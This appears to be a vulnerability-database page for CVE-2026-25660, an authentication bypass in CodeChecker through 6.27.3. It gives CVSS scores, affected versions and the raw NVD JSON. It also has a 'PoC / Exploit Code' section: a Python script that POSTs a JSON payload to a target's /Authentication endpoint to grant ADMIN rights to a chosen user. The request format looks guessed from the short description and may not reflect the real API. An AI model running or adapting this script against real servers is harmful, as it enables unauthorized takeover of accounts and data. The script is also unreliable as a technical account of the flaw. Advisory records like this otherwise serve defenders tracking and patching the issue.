Security Vulnerability Report
中文
CVE-2026-25660 CVSS 9.8 CRITICAL

CVE-2026-25660

Published: 2026-04-24 14:16:18
Last Modified: 2026-04-27 14:48:21
Source: 85b1779b-6ecd-4f52-bcc5-73eac4659dcf

Description

CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. Authentication bypass occurs when the URL ends with Authentication with certain function calls.  This bypass allows assigning arbitrary permission to any user existing in CodeChecker. This issue affects CodeChecker: through 6.27.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:* - VULNERABLE
CodeChecker <= 6.27.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit for CVE-2026-25660 # Target: CodeChecker instance def exploit_auth_bypass(target_host, target_user): # The vulnerability occurs when the URL ends with 'Authentication' # and includes specific function calls to assign permissions. url = f"http://{target_host}/Authentication" headers = { "Content-Type": "application/json" } # Payload to assign administrative privileges to a user payload = { "function": "assignPermission", "params": { "user": target_user, "permission": "ADMIN" } } try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Exploit successful! {target_user} granted ADMIN rights.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": target = "example-codechecker.com" victim_user = "test_user" exploit_auth_bypass(target, victim_user)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-25660", "sourceIdentifier": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "published": "2026-04-24T14:16:18.127", "lastModified": "2026-04-27T14:48:20.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \nAuthentication bypass occurs when the URL ends with Authentication with certain function calls.  This bypass allows assigning arbitrary permission to any user existing in CodeChecker.\n\nThis issue affects CodeChecker: through 6.27.3."}], "metrics": {"cvssMetricV40": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:M/U:Red", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ericsson:codechecker:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.27.4", "matchCriteriaId": "8ADCD29D-92CF-4F8D-AF53-64FF833A0A3F"}]}]}], "references": [{"url": "https://github.com/Ericsson/codechecker/security/advisories/GHSA-4v9x-cqc5-j645", "source": "85b1779b-6ecd-4f52-bcc5-73eac4659dcf", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.